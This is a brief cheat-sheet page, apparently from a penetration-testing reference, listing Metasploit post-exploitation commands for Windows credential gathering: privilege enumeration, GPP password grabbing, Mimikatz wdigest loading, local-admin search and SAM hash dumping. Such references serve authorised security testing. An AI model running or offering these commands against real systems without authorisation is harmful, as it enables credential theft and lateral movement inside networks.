Coletando Credenciais

Windows Metasploit Modules for privilege escalation.

Comando

Descrição

run post/windows/gather/win_privs

Mostrar privilégios do usuário corrente

use post/windows/gather/credentials/gpp

grab GPP saved passwords

load mimikatz -> wdigest

load Mimikatz

run post/windows/gather/local_admin_search_enum

idenitfy other machines that the supplied domain user has administrative access to

run post/windows/gather/smart_hashdump

Automated dumping of sam file, tries to esc privileges etc

Last updated